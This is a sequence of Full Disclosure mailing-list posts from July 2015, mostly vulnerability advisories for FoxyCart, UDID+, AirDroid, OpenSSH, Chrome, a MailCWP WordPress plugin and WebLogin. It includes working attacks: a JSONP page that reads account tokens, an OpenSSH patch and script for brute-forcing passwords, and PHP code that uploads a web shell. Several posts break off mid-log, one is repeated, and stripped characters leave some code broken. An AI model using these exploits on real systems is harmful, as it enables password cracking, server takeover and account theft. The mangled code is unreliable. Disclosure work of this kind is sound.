[FD] FoxyCart Bug Bounty #1 - Filter Bypass Persistent Vulnerability
Document Title: === FoxyCart Bug Bounty #1 - Filter Bypass Persistent Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1451 098bdc9b309783df65044c5abb690dafdd4bcd436c380ae68c924fe37e14b4e0 Release Date: = 2015-07-15 Vulnerability Laboratory ID (VL-ID): 1451 Common Vulnerability Scoring System: 3.4 Product Service Introduction: === Helping developers _add_ custom ecommerce without reinventing the wheel. (Copy of the Homepage: https://github.com/FoxyCart ) Abstract Advisory Information: == The Vulnerability Laboratory Core Research Team discovered a filter bypass issue and an application-side input validation vulnerability in the official FoxyCart web-application. Vulnerability Disclosure Timeline: == 2015-03-05: Researcher Notification Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2015-04-01: Vendor Notification (FoxyCart - Security Research Team) 2015-04-09: Vendor Response/Feedback (FoxyCart - Security Research Team) 2015-06-30: Vendor Fix/Patch ( (FoxyCart - Developer Team) 2015-07-15: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): FoxyCart LLC Product: FoxyCart - Web Application 2015 Q2 Exploitation Technique: === Remote Severity Level: === Medium Technical Details Description: A persistent input validation mail encoding vulnerability has been discovered in the official FoxyCart company web-application. The issue allows remote attackers to inject own malicious web context to the application-side of a vulnerable module or function. The security vulnerability is located in the `comments` input field value of the `landing/white-glove-onboarding Help Form` module. Remote attackers can exploit the issue to execute persistent malicious context in foxycart service mails. The injection takes place in the help contact form POST method request with the vulnerable comments input value. The execution of the script code occurs on the application-side in the email body context. Attackers are able to inject iframes, img sources with onload alert or other script code tags. The service does not encode the input and has also no input restriction. After the code has been saved during the registration the internal service takes the wrong encoded dbms entries and stream them back in a notification mail to the registered users inbox. The attacker is also able to include random email adresses to stream mails with malicious persistent context to random targets for phishing, spam and co. The code does not execute in the profile values that introduces to the manufacturer itself but in the attached comments value that becomes visible in the copy mail. The security risk of the persistent input validation web vulnerability in the mail encoding of the web-server is estimated as medium with a cvss (common vulnerability scoring system) count of 3.4. If the issue is existing in the main service values the other services can be affected by the issue too. Exploitation of the mail encoding and web-server validation vulnerability requires low or medium user interaction and no privileged customer application user account. Successful exploitation of the persistent mail encoding web vulnerability results in session hijacking, persistent phishing attacks, persistent redirects to external malicious source and persistent manipulation of affected or connected module context. Request Method(s): [+] POST Vulnerable Module(s): [+] landing/white-glove-onboarding Help Form Vulnerable Parameter(s): [+] comments Affected Module(s): [+] We`ve received your email Proof of Concept (PoC): === The persistent input validation web vulnerability can be exploited by remote attackers without privileged application user account and with low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce ... 1. Open the foxcart service 2. Surf to the vulnerable conatct form url 3. Inject random value to the inputs and inject to the comments your script code payload 4. Save the entry 5. Redirect via Refresh Referer to confirm the contact request 6. Check inbox of the contact mail input 7. The code executes in the comments body section 8. Successful reproduce of the vulnerability! --- PoC Session Logs [POST] (Inject) --- 13:33:03.031[1210ms][total 1210ms] Status: 302[Found] POST
[FD] UDID+ v2.5 iOS - Mail Command Inject Vulnerability
Document Title: === UDID+ v2.5 iOS - Mail Command Inject Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1542 Release Date: = 2015-07-06 Vulnerability Laboratory ID (VL-ID): 1542 Common Vulnerability Scoring System: 5.7 Product Service Introduction: === UDID+ is a simple tool that displays the Unique Device Identifier (UDID) and other information of your iOS device. It works on iPod touches, iPhones and iPads allows you to either email the UDID to someone, or to copy it. The UDID is used by developers so they can add your device to their Ad Hoc distribution profiles. This allows them to create a special version of their apps that can be run on your device outside of the normal App Store distribution channels. Ad Hoc distribution is perfect for beta testing as well as for small in-house projects with an limited distribution group, of up to 100 devices. (Copy of the Vendor Homepage: https://itunes.apple.com/us/app/udid+/id385936840 ) Abstract Advisory Information: == The Vulnerability Laboratory Core Research Team discovered an application-side command inject web vulnerability in the official UDID+ v2.5 iOS mobile web-application. Vulnerability Disclosure Timeline: == 2015-07-06: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): EMonster Inc. Product: UDID+ - iOS Mobile Web Application 2.5 Exploitation Technique: === Local Severity Level: === Medium Technical Details Description: A local command inject web vulnerability has been discovered in the official UDID+ v2.5 iOS mobile web-application. The vulnerability allows to inject malicious script codes to the application-side of the vulnerable iOS mobile app. The vulnerability is located in the device name value of the send by mail function. Local attackers are able to manipulate the name value of the device to compromise the mail function of the udid+ mobile app. The html encoding is broken in the send by mail export function. Local attackers are able to manipulate the device name id to compromise the application internal validation via send by email. The attack vector of the vulnerability is server-side and the injection point is the device name information settings. The security risk of the local commandpath inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.7. Exploitation of the commandpath inject vulnerability requires a low privilege androidios device account with restricted access and no user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to compromise the mobile iOS application and connected device components. Vulnerable Module(s) [+] Device - Settings - Information Vulnerable Parameter(s) [+] device cell name (cid) Affected Module(s) [+] UDID+ - Mail Proof of Concept (PoC): === The application-side validation web vulnerability can be exploited by local attackers with low privilege or restricted device user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: UDID+ Send Mail htmlheadtitleUDID+/title link rel=important stylesheet href=chrome://messagebody/skin/messageBody.css /headbody table border=0 cellspacing=0 cellpadding=0 width=100% class=header-part1 trtdbBetreff: /bUDID+/td/trtrtdbVon: /bBenjamin Mejri Kunz vulnerability...@icloud.com/td/tr trtdbDatum: /b28.06.2015 20:49/td/tr/tabletable border=0 cellspacing=0 cellpadding=0 width=100% class=header-part2 trtdbAn: /baki b...@evolution-sec.com/td/tr/tablebr htmlheadmeta http-equiv=content-type content=text/html; /headbody dir=autodivHere is my device information.brbr bUDID:/b C63FF684821B430C91F7F41D4D8A2F3Abr bDevice Name:/b bkm337 src=cid:%20./[LOCAL FILE INCLUDE VULNERABILITY VIA DEVICE CELL NAME VALUE!] bSystem Name:/b iPhone OSbr / bSystem Version:/b 8.3br / bPlatform:/b iPad 3G WiFibr / bHardware Model:/b P101APbr / bProcessors:/b 2br / bCPU Frequency:/b 0 Hzbr / bBus Frequency:/b 0 Hzbr / bPhysical Memory:/b 1 GBbr / bNon-Kernel Memory:/b 809,21 MBbr / bModel:/b iPadbr / bLocalized Model:/b iPadbr / bLanguage:/b debr / bLocale:/b de_DEbr / bCapacity:/b 32 GBbr / bFormatted:/b 27,19 GBbr / bUsed:/b 26,38 GBbr / bFree:/b 825,48 MBbr / bBattery State:/b Unpluggedbr / bBattery Level:/b 65 %br / bLocal IP:/b 192.168.2.104br / bMAC
[FD] AirDroid ID - Client Side JSONP Callback Vulnerability
Document Title:
===
AirDroid ID - Client Side JSONP Callback Vulnerability
References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1544
Release Date:
=
2015-07-10
Vulnerability Laboratory ID (VL-ID):
1544
Common Vulnerability Scoring System:
5.6
Product Service Introduction:
===
Calls, SMS, and the app notifications you allowed, mirrored to the large
computer screen you are focusing on. Type with full physical keyboard and
control with mouse. Transfer things faster without looking for a cable. Better
equipments, better life. AirMirror, a brand new way of interacting between
PC/Mac and your Android. Your Android, right on your computer, right now. With
the new Desktop client, your Android, Windows and Mac work like one.
(Copy of the Vendor Homepage: https://www.airdroid.com/en/ )
Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a client-side
vulnerability in the official AirDroid ID login online-service web-application.
Vulnerability Disclosure Timeline:
==
2015-07-06: Researcher Notification Coordination (Hadji Samir)
2015-07-07: Vendor Notification (Android Security Team)
2015-07-09: Vendor Response/Feedback (Android Security Team)
2015-07-10: Vendor Fix/Patch (Android Developer Team)
2015-07-10: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=
Published
Affected Product(s):
Sand Studio
Product: Airdroid - Online Service (Web-Application) 2015 Q2
Exploitation Technique:
===
Remote
Severity Level:
===
Medium
Technical Details Description:
A client-side jsonp callback vulnerability has been discovered in the official
Airdroid online-service web-application.
The vulnerability allows remote attackers to manipulate client-side application
to browser requests to compromise session data.
The vulnerability is located in the callback parameter value of the vulnerable
signIn.html file. The vulnerability allows remote
attackers to inject script code by client-side manipulated GET method requests.
The vulnerability allows remote attacker to call
an callback JSONP for get the information about the user
The vulnerability allows remote attackers to callback script code by
client-side manipulated GET method requests. Thus can result in an id
account or device compromise. The attack vector of the vulnerability is located
on the client-side and the request method to inject/execute
is GET. The service replies via jsonp by a callback with wrong cleanup which
results in the unexpected behaviour.
The security risk of the client-side web vulnerability is estimated as medium
with a cvss (common vulnerability scoring system) count of 5.6.
Exploitation of the cross site scripting web vulnerability requires no
privilege web application user account and low user interaction (click).
Successful exploitation results in client-side account theft by hijacking,
client-side phishing, client-side external redirects and non-persistent
manipulation of affected or connected service modules.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Login [Web]
(./p14/user/)
Vulnerable File(s):
[+] signIn.html
Vulnerable Parameter(s):
[+] callback
Proof of Concept (PoC):
===
The client-side callback vulnerability can be exploited by remote attackers
without privilege application user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
PoC: *.html
html
head
script
samir = function(data) {
alert(Name + data.result.nickname + mail + data.result.mail + id +
data.result.id + token + data.result.pc_push_token );
}
/script
/head
body
h1JSONP Call/h1
script
src=https://id.airdroid.com/p14/user/signIn.html?callback=samir;/script
/body
/html
Vulnerable Source: JSONP Call
samir({code:1,result:{id:9731220,nickname:Hadji+Samir,mail:info.dima...@gmail.com,create_date:2015-07-06
06:18:40,data_flow_total:0,vip:0,vip_starttime:null,vip_endtime:null,from_type:,read_new:1,mail_verify:0,avatar_url:,last_update_avatar:2015-07-06
06:18:40,country:DZ,isPremium:-1,is_recurring:0,has_device:1,device:[{id:10257826,name:htc
HTC
[FD] UDID+ v2.5 iOS - Mail Command Inject Vulnerability
Benjamin, What is an androidios device account? Is that a typo? And does the default mobile/alpine user account suffice? It isn't clear to me whether the iOS device needs to be jailbroken for this exploit to work. The -- Douglas Held d...@douglasheld.net via dough...@gmail.com Note: Sent from a device that occasionally respells and replaces words On 17 Jul 2015, at 10:08, fulldisclosure-requ...@seclists.org wrote: Message: 8 Date: Fri, 17 Jul 2015 15:04:22 +0200 From: Vulnerability Lab resea...@vulnerability-lab.com To: fulldisclosure@seclists.org Subject: [FD] UDID+ v2.5 iOS - Mail Command Inject Vulnerability Message-ID: 55a8fd56.1060...@vulnerability-lab.com Content-Type: text/plain; charset=utf-8 Document Title: === UDID+ v2.5 iOS - Mail Command Inject Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1542 Release Date: = 2015-07-06 Vulnerability Laboratory ID (VL-ID): 1542 Common Vulnerability Scoring System: 5.7 Product Service Introduction: === UDID+ is a simple tool that displays the Unique Device Identifier (UDID) and other information of your iOS device. It works on iPod touches, iPhones and iPads allows you to either email the UDID to someone, or to copy it. The UDID is used by developers so they can add your device to their Ad Hoc distribution profiles. This allows them to create a special version of their apps that can be run on your device outside of the normal App Store distribution channels. Ad Hoc distribution is perfect for beta testing as well as for small in-house projects with an limited distribution group, of up to 100 devices. (Copy of the Vendor Homepage: https://itunes.apple.com/us/app/udid+/id385936840 ) Abstract Advisory Information: == The Vulnerability Laboratory Core Research Team discovered an application-side command inject web vulnerability in the official UDID+ v2.5 iOS mobile web-application. Vulnerability Disclosure Timeline: == 2015-07-06:Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): EMonster Inc. Product: UDID+ - iOS Mobile Web Application 2.5 Exploitation Technique: === Local Severity Level: === Medium Technical Details Description: A local command inject web vulnerability has been discovered in the official UDID+ v2.5 iOS mobile web-application. The vulnerability allows to inject malicious script codes to the application-side of the vulnerable iOS mobile app. The vulnerability is located in the device name value of the send by mail function. Local attackers are able to manipulate the name value of the device to compromise the mail function of the udid+ mobile app. The html encoding is broken in the send by mail export function. Local attackers are able to manipulate the device name id to compromise the application internal validation via send by email. The attack vector of the vulnerability is server-side and the injection point is the device name information settings. The security risk of the local commandpath inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.7. Exploitation of the commandpath inject vulnerability requires a low privilege androidios device account with restricted access and no user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to compromise the mobile iOS application and connected device components. Vulnerable Module(s) [+] Device - Settings - Information Vulnerable Parameter(s) [+] device cell name (cid) Affected Module(s) [+] UDID+ - Mail Proof of Concept (PoC): === The application-side validation web vulnerability can be exploited by local attackers with low privilege or restricted device user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: UDID+ Send Mail htmlheadtitleUDID+/title link rel=important stylesheet href=chrome://messagebody/skin/messageBody.css /headbody table border=0 cellspacing=0 cellpadding=0 width=100% class=header-part1 trtdbBetreff: /bUDID+/td/trtrtdbVon: /bBenjamin Mejri Kunz vulnerability...@icloud.com/td/tr trtdbDatum: /b28.06.2015 20:49/td/tr/tabletable border=0 cellspacing=0 cellpadding=0 width=100% class=header-part2 trtdbAn: /baki b...@evolution-sec.com/td/tr/tablebr
[FD] OpenSSH keyboard-interactive authentication brute force vulnerability (MaxAuthTries bypass)
OpenSSH has a default value of six authentication tries before it will
close the connection (the ssh client allows only three password
entries per default).
With this vulnerability an attacker is able to request as many
password prompts limited by the “login graced time” setting, that is
set to two minutes by default.
Especially FreeBSD systems are affected by the vulnerability because
they have keyboard-interactive authentication enabled by default.
A simple way to exploit the bug is to execute this command:
ssh -lusername -oKbdInteractiveDevices=`perl -e 'print pam, x
1'` targethost
This will effectively allow up to 1 password entries limited by
the login grace time setting.
The crucial part is that if the attacker requests 1
keyboard-interactive devices openssh will gracefully execute the
request and will be inside a loop to accept passwords until the
specified devices are exceeded.
Here is a patch for openssh-6.9p1 that will allow to use a wordlist
and any passwords piped to the ssh process to be used in order to
crack passwords remotely.
---snip---
diff openssh-6.9p1/sshconnect2.c openssh-6.9p1-modified/sshconnect2.c
83a84,85
char password[1024];
510c512,517
authctxt-success = 1; /* break out */
---
printf(==\n);
printf(*** SUCCESS **\n);
printf(*** PASSWORD: %s\n, password);
printf(==\n);
exit(0);
1376a1384,1385
char *devicebuffer;
int i;
1386a1396,1405
devicebuffer = calloc(1, 20);
if (!devicebuffer) {
fatal(cannot allocate devicebuffer);
}
for (i=0;i20-2;i+=2) {
memcpy(devicebuffer + i, p,, 2);
}
devicebuffer[20] = 0;
1393,1394c1412
packet_put_cstring(options.kbd_interactive_devices ?
options.kbd_interactive_devices : );
---
packet_put_cstring(devicebuffer);
1408c1426
char *name, *inst, *lang, *prompt, *response;
---
char *name, *inst, *lang, *prompt;
1410c1428
int echo = 0;
---
char *pos;
1425a1444
1430a1450
1443,1449c1463,1469
echo = packet_get_char();
response = read_passphrase(prompt, echo ? RP_ECHO : 0);
packet_put_cstring(response);
explicit_bzero(response, strlen(response));
free(response);
---
packet_get_char();
if (fgets(password, 1024, stdin) == NULL)
exit(0);
if ((pos=strchr(password, '\n')) != NULL)
*pos = '';
printf(%s\n, password);
packet_put_cstring(password);
---snip---
After applying the patch you can use this shell script to make the
password attack from a wordlist:
---snip---
#!/bin/bash
# run as:
# cat wordlist.txt | ./sshcracker.sh ssh-username ssh-target
#
while true
do
./ssh -l$1 $2
rc=$?; if [[ $rc == 0 ]]; then exit $rc; fi
echo Respawn due to login grace time...
done
---snip---
For example enter this command:
cat wordlist.txt | ./sshcracker.sh test 192.168.2.173
The attack has been tested against a new FreeBSD 10.1 system and older
FreeBSD versions such as version 6.2.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] 1503A - Chrome - ui::AXTree::Unserialize use-after-free
T*L;DR* After 60 day deadline has passed, I am releasing details on an unfixed use-after-free vulnerability in Chrome's accessibility features, which are disabled by default. The issue does not look exploitable. *More details* http://berendjanwever.blogspot.nl/2015/07/1503a-chrome-uiaxtreeunserialize-use.html *Chromium bug*https://code.google.com/p/chromium/issues/detail?id=479743 Cheers, SkyLined Gratuitous ASCII - db db SOMEBODYb SETUPUS SS SS SSdb db db CSb, db CD CD SS SS ;S; CTHEBOMBSb ,SY' CMOVEZIGb ,SY' ` SS_ SS SS ,SP SS SS _qSS SP _qSS iD b,_ SS SS dSYbiS' SS CS7SS ,SP` CS7SS,SS` SS `'*YD YP YP dS' Yb ,S*SP SS _,S7' SS_,dSP' SS 4S' YD C* CSP` YPCS7` YP CS7' YP CD CD for great justice ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
On Jul 16, 2015, at 8:18 PM, Larry W. Cashdollar lar...@me.com wrote: Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-09 Download Site: https://wordpress.org/plugins/mailcwp/ Vendor: CadreWorks Pty Ltd Vendor Notified: 2015-07-09 fixed in v1.110 Typo should be v1.100. ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-09
Download Site: https://wordpress.org/plugins/mailcwp/
Vendor: CadreWorks Pty Ltd
Vendor Notified: 2015-07-09 fixed in v1.110
Vendor Contact: Contact Page via WP site
Description: MailCWP, Mail Client for WordPress. A full-featured mail client
plugin providing webmail access through your WordPress blog or website.
Vulnerability:
The code in mailcwp-upload.php doesn't check that a user is authenticated or
what type of file is being uploaded any user can upload a shell to the target
wordpress server:
2 $message_id = $_REQUEST[message_id];
3 $upload_dir = $_REQUEST[upload_dir];
.
.
8 $fileName = $_FILES[file][name];
9 move_uploaded_file($_FILES[file][tmp_name],
$upload_dir/$message_id-$fileName);
Exploitation requires the attacker to guess a writeable location in the http
server root.
CVEID:
OSVDB:
Exploit Code:
• ?php
• /*Larry W. Cashdollar @_larry0
• Exploit for mailcwp v1.99 shell will be called 1-shell.php.
• 7/9/2015
• */
• $target_url =
'http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1upload_dir=/usr/share/wordpress/wp-content/uploads';
• $file_name_with_full_path = '/var/www/shell.php';
•
• echo POST to $target_url $file_name_with_full_path;
• $post = array('file' =
'shell.php','file'='@'.$file_name_with_full_path);
•
• $ch = curl_init();
• curl_setopt($ch, CURLOPT_URL,$target_url);
• curl_setopt($ch, CURLOPT_POST,1);
• curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
• curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
• $result=curl_exec ($ch);
• curl_close ($ch);
• echo hr;
• echo $result;
• echo hr;
• ?
•
Advisory: http://www.vapid.dhs.org/advisory.php?v=138
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] weblogin software cross site request
Hi, People i discover a cross site request in this Dork: intitle:weblogin intext:This page will redirect you to: This cross site request is exploit like this example: http://target/Login:%20Weblogin%20%20This%20page%20will%20redirect%20you%20to%20 inject any word you want to screen in the webpage. Or another Poc is for example: http:target?referer=inject the word or number you want to like view in the page. I advice fix this bug because is very easy deface this webpages whith Product:WebLogin Best Regard. Rootktit Pentester. ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
